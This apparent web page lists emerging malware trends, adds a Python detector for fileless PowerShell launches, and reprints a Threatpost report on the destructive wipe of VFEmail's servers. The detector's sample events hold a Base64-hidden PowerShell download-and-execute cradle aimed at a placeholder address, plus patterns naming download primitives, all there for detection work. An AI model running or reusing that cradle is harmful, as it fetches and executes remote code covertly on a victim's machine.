How to Research


New Malware Attacks

Just when you thought you had all of your defenses in place against malware, cyber attacks, and ransomware… think again! Cybercriminals are busy crafting new attack methods aimed squarely at your data and your personal information. Here are 10 new sneaky attacks to be on the look-out for in the new year!

Rival governments and geopolitical cyber-warfare funding the efforts of cybercriminal gangs to create chaos, steal intellectual property, and profit from fraud and extortion by breaching personal data
New variants of ransomware (including doxware, which threatens to publish sensitive data such as browsing histories unless a ransom is paid)
Much more widespread cryptojacking (stealing computing resources to mine cryptocurrency, with none of the profit going to the owner of the hardware)
More distributed denial-of-service (DDoS) attacks on critical servers and networks, abetted by the conscription of armies of Internet-of-Things (IoT) devices
Increasing use of fileless malware (which never becomes disk-resident but is loaded directly into memory, and thus evades many signature-based, file-scanning endpoint anti-malware measures; the launch itself, typically a scripted command line, is what remains to detect)
More synergistic attacks (in which several malware components are injected onto a system and the one facing the weakest defenses is activated, with AI and ML used to refine the attack techniques)
Continued reliance on phishing as the most effective delivery vector for malware, with more sophisticated attacks targeted at higher-value individuals
Increased targeting of cloud services and edge computing environments with malware
Enslavement of legions of IoT devices for use in DDoS and cryptojacking attacks
Exploitation of the new attack surfaces and rich data targets presented by 5G networks and applications
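The fileless-malware item above is the one on this list that maps most directly to a detection problem: a payload that never touches disk still has to be launched, and on Windows that launch usually leaves a command line and a parent process behind in process-creation telemetry. The following Python script is an added example, not code from the original page: it scores constructed process-creation events (a stand-in for the parent-image and command-line fields of Sysmon Event ID 1 / Windows 4688 records; the log format, indicator weights, and threshold are my assumptions) and decodes -EncodedCommand payloads so that a download cradle hidden inside them can be matched:

```python
"""Added example: flag process-creation events that carry fileless PowerShell tradecraft.

The log format is a constructed stand-in for the parent-image / command-line fields of a
Sysmon Event ID 1 or Windows 4688 record:  <timestamp> <parent_image> -> <command_line>
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional


def encode_for_powershell(script: str) -> str:
    """Encode a script the way it is fed to -EncodedCommand: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (no real incident data). The second event is an in-memory
# download cradle hidden behind -EncodedCommand and spawned by Word.
SAMPLE_EVENTS = [
    r"2019-02-12T03:14:07 C:\Windows\explorer.exe -> powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    r"2019-02-12T03:15:22 C:\Program Files\Microsoft Office\WINWORD.EXE -> powershell.exe -nop -w hidden -enc "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"),
    "2019-02-12T03:16:01 C:\\Windows\\System32\\cmd.exe -> powershell.exe -w hidden -c "
    "\"Invoke-Expression ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('V3JpdGUtSG9zdCAxMjM=')))\"",
    r"2019-02-12T03:17:45 C:\Windows\System32\services.exe -> svchost.exe -k netsvcs",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<parent>.+?)\s+->\s+(?P<cmd>.+)$")
POWERSHELL_RE = re.compile(r"(?i)\bpowershell(?:_ise)?\.exe|\bpwsh(?:\.exe)?\b")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# (?!x) keeps -ExecutionPolicy out, and the length floor rules out policy names like "Bypass".
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?!x)[a-z]*\s+([A-Za-z0-9+/=]{16,})")

# (indicator, pattern, weight). Weights are assumptions chosen for this example.
INDICATORS = [
    ("download_cradle", re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"), 3),
    ("invoke_expression", re.compile(r"(?i)invoke-expression|\biex\b"), 3),
    ("base64_decode", re.compile(r"(?i)frombase64string"), 2),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    ("no_profile", re.compile(r"(?i)-nop(?:rofile)?\b"), 1),
    ("non_interactive", re.compile(r"(?i)-noni(?:nteractive)?\b"), 1),
]
OFFICE_PARENT_RE = re.compile(r"(?i)\\(?:winword|excel|powerpnt|outlook)\.exe$")
THRESHOLD = 5  # assumption: tune against your own baseline of legitimate PowerShell use


@dataclass
class Finding:
    timestamp: str
    parent: str
    command: str
    indicators: List[str] = field(default_factory=list)
    score: int = 0
    decoded: Optional[str] = None


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None when the flag is absent."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable encoded payload>"  # malformed on purpose? still worth a look


def analyze(line: str) -> Finding:
    """Parse one event and accumulate indicator weights for it."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    finding = Finding(m["ts"], m["parent"], m["cmd"])
    if not POWERSHELL_RE.search(finding.command):
        return finding  # only PowerShell launches are in scope for this detector
    finding.decoded = decode_encoded_command(finding.command)
    # Never pattern-match the raw Base64 blob; match the decoded script instead.
    text = ENC_RE.sub(" -EncodedCommand <blob>", finding.command)
    if finding.decoded is not None:
        finding.indicators.append("encoded_command")
        finding.score += 3
        text += "\n" + finding.decoded  # the cradle usually hides in the decoded script
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            finding.indicators.append(name)
            finding.score += weight
    if OFFICE_PARENT_RE.search(finding.parent):
        finding.indicators.append("office_parent")  # Office spawning a shell is a classic macro tell
        finding.score += 4
    return finding


def scan(events) -> List[Finding]:
    """Return the events whose combined indicator weight reaches THRESHOLD."""
    return [f for f in map(analyze, events) if f.score >= THRESHOLD]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.timestamp}  score={f.score}  parent={f.parent}")
        print("  indicators:", ", ".join(f.indicators))
        if f.decoded:
            print("  decoded:", f.decoded)
```

Two caveats a practitioner would raise. Command-line matching is only as good as the strings the attacker leaves in place, and string obfuscation or a payload fetched by a second stage will sidestep these patterns, so treat the score as a triage aid and pair it with PowerShell script block logging (Event ID 4104), which records the script as it was actually executed. And the weights above are deliberately crude: a legitimate admin scheduled task that uses -NoProfile and -WindowStyle Hidden will score 3 on its own, so the threshold needs baselining per environment before anything here pages anyone.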

A Threatpost Report: Attackers Completely Destroy VFEmail’s Secure Mail Infrastructure

“Every file server is lost, every backup server is lost.”

A catastrophic, smash-and-destroy cyberattack has eliminated the U.S. infrastructure for secure email service VFEmail. It’s a rare example of a purely destructive offensive, apparently unmotivated by financial gain or espionage goals.

An attacker wiped out the company’s U.S. servers on Monday evening, including backups, destroying almost two decades’ worth of user data in just a few hours. VFEmail owner Rick Romero noted that the attack took aim at VFEmail’s “entire infrastructure,” including mail hosts, VM [virtual machine] hosts, an SQL server cluster and the virtual machines themselves.

“At this time, the attacker has formatted all the disks on every server,” tweeted the company. “Every VM [virtual machine] is lost. Every file server is lost, every backup server is lost.”

Romero added that kind of access means that whoever did this had multiple passwords: “If they all had one password, sure, but they didn’t. That’s the scary part,” he tweeted. The company account added, “Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via SSH exploit, and there was no ransom. Just attack and destroy.”

In an update posted to the company’s website, Romero identified the hacker as “last seen aktv[at]94.155.49.9” – he caught the malefactor in the act, but wasn’t able to salvage much.

Romero said in the website update that incoming mail was now being delivered, but that getting anything historical back would be unlikely.

While attacks that do nothing more than destroy infrastructure have been launched in the past (think Shamoon, BlackEnergy, Destover, ExPetr/NotPetya and Olympic Destroyer), the question remains as to why someone would want to take out a niche-focused Wisconsin-based email provider. Wiper attacks and other destructive efforts are generally used to send a political message.

“This kind of destructive attack, with no stated motive or demands, is quite rare,” Chris Morales, head of security analytics at Vectra, said via email. “An organization losing all of their data, and all of their customer data, is a nightmare scenario that could easily put a small company out of business and cause a huge financial impact on a large enterprise. Sony suffered this type of catastrophic destruction in 2014, which was attributed to North Korea.”

Romero intimated that this could indeed signal the end for his privacy-focused company, which he started in 2001: “Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

Beyond the possibility of a personal vendetta being behind the incident, Justin Fier, director for Cyber Intelligence and Analysis at Darktrace, said that the incident could be attackers simply wanting to cover their tracks after successful data exfiltration.

“It’s easy to imagine the attacker may have gotten what they wanted and figured the best way to clean up was to destroy all the evidence,” he said via email. “In the past, this tactic was frowned upon as it is inherently noisy, and many attackers want to be as stealthy as possible. However, we’ve clearly entered a new era of attacks.”

He added, “This attack has some of the telltale signs of nation-state activity and it’s interesting to consider why a nation state might want to do this. What information was on VFEmail’s servers that a nation-state might want to obtain, or, on the other hand, what might they not want found?”

Details are scant in terms of how the attack was carried out so effectively – the multiple password aspect could suggest an inside job. Meanwhile, some security researchers are questioning why there was not better backup in place.

“This raises questions of what disaster recovery strategy was in place and why data wasn’t backed up into cold storage, thus making it unavailable to attackers,” Fausto Oliveira, principal security architect at Acceptto, told Threatpost. “If they had a strategy in place, they should be able to recover at least a substantial part of their customers’ data. The fact that attackers were able to access and erase all the information demonstrates that the systems were not protected in an effective way.”

Morales meanwhile added that “the first thought that comes to mind is this is a service being sold as a secure email. The second is that if this is secure email then where are the offline backups and archives? Offline backups might not give a full restore to the exact date data was lost, but it would prevent the complete loss of all historical user data. Offline backup is the same strategy organizations are using to counter loss from ransomware.”